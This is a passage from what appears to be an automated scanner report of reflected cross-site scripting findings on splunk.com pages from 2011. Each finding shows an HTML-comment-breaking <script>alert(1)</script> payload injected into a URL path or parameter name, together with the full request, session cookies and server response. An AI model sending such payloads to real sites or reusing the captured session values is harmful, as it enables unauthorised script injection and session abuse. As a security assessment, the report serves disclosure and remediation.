__kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:15:58 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:45:58 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:45:58 GMT; path=/ ETag: d34176d21d537c8c2c4df1f7e1b712c51296944158 Last-Modified: Sat, 05 Feb 2011 22:15:58 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18407
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.559. http://www.splunk.com/view/free-vs-enterprise/SP-CAAAE8W [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/free-vs-enterprise/SP-CAAAE8W
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload c2629--><script>alert(1)</script>f078687f339 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/free-vs-enterprise/SP-CAAAE8W?c2629--><script>alert(1)</script>f078687f339=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:14:07 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: 5eb647cce461672deb643d7a037770781296944048 Last-Modified: Sat, 05 Feb 2011 22:14:08 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24945
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 3e70c--><script>alert(1)</script>05babae2627 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view3e70c--><script>alert(1)</script>05babae2627/government/SP-CAAADSN HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:16:13 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:46:13 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:46:13 GMT; path=/ ETag: 265c00c3c71164968a855bbab00cdc151296944173 Last-Modified: Sat, 05 Feb 2011 22:16:13 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload 2eecb--><script>alert(1)</script>91a23fb9d9a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/government2eecb--><script>alert(1)</script>91a23fb9d9a/SP-CAAADSN HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload b1497--><script>alert(1)</script>895ca3993cc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/government/SP-CAAADSNb1497--><script>alert(1)</script>895ca3993cc HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:17:15 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:47:15 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:47:15 GMT; path=/ ETag: 96811fedb7914fea2c4614aba4bb54081296944236 Last-Modified: Sat, 05 Feb 2011 22:17:16 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18375
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.563. http://www.splunk.com/view/government/SP-CAAADSN [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/government/SP-CAAADSN
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 80c9f--><script>alert(1)</script>9b99d5f8108 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/government/SP-CAAADSN?80c9f--><script>alert(1)</script>9b99d5f8108=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:15:34 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 33909
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload 26708--><script>alert(1)</script>4587e045795 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view26708--><script>alert(1)</script>4587e045795/it-operations-solutions/SP-CAAADSA HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 2 is copied into an HTML comment. The payload 824e4--><script>alert(1)</script>1220702ef76 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/it-operations-solutions824e4--><script>alert(1)</script>1220702ef76/SP-CAAADSA HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload d8f10--><script>alert(1)</script>5ff377df7fb was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/it-operations-solutions/SP-CAAADSAd8f10--><script>alert(1)</script>5ff377df7fb HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:17:48 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:47:48 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:47:48 GMT; path=/ ETag: 7854d835c894accea2a869badbd1ccc81296944269 Last-Modified: Sat, 05 Feb 2011 22:17:49 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18427
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
4.567. http://www.splunk.com/view/it-operations-solutions/SP-CAAADSA [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.splunk.com
Path: /view/it-operations-solutions/SP-CAAADSA
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 84e1d--><script>alert(1)</script>9156541d1aa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/it-operations-solutions/SP-CAAADSA?84e1d--><script>alert(1)</script>9156541d1aa=1 HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 200 OK Date: Sat, 05 Feb 2011 22:15:46 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public ETag: ef0c0c305024f14f5eaf7be99c3522ed1296944148 Last-Modified: Sat, 05 Feb 2011 22:15:48 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 41736
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 1 is copied into an HTML comment. The payload cad17--><script>alert(1)</script>e70873f6fc6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /viewcad17--><script>alert(1)</script>e70873f6fc6/long-tail/SP-CAAAE7F HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
Response
HTTP/1.1 404 Not Found Date: Sat, 05 Feb 2011 22:16:57 GMT Server: Apache/2.2.8 (EL) Vary: Host,Accept-Encoding,User-Agent X-Powered-By: PHP/5.2.6 Expires: 0 Cache-Control: public, must-revalidate Pragma: public Set-Cookie: splunk_com_uid=1; expires=Sat, 05-Feb-2011 22:46:57 GMT; path=/ Set-Cookie: splunk_com_xt_uid=1; expires=Sat, 05-Feb-2011 22:46:57 GMT; path=/ ETag: 86b7379928aad6e5336a1838634d029f1296944218 Last-Modified: Sat, 05 Feb 2011 22:16:58 GMT Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 18371
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of REST URL parameter 2 is copied into an HTML comment. The payload e7a52--><script>alert(1)</script>4d9b54343ec was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /view/long-taile7a52--><script>alert(1)</script>4d9b54343ec/SP-CAAAE7F HTTP/1.1 Host: www.splunk.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Enabled=true; Apache=173.193.214.243.1296942538894423; __kti=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __utmz=204527314.1296942566.1.1.utmgclid=CPeW6bn_8aYCFcfe4Aod22SxHw|utmccn=(not%20set)|utmcmd=(not%20set); PHPSESSID=fi3ckujbctl2f58e0314143p91; __ktv=b41b-2a6a-eded-246412df7cd0af7; __utma=204527314.226449434.1296942566.1296942566.1296942566.1; XARAYASID=1mtgfd73mkm07svvqv720eu567; __utmc=204527314; __utmb=204527314.1.10.1296942566; __kts=1296942566134,http%3A%2F%2Fwww.splunk.com%2Fdownload%3Fac%3DAdwords_Unix%26_kk%3Dunix%2520server%26_kt%3Dc6320b89-e2a5-4dbf-a9d0-dd556bdb1c51%26gclid%3DCPeW6bn_8aYCFcfe4Aod22SxHw,http%3A%2F%2Fpagead2.googlesyndication.com%2Fpagead%2Fimgad%3Fid%3DCK6sofbu_LPoWxDYBRhaMgh0G7V5PxSHIg; __ktt=ea5-22fb-55cd-38e12df7cd0af8;
The value of REST URL parameter 3 is copied into an HTML comment. The payload 85de3--><script>alert(1)</script>3571f6545de was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
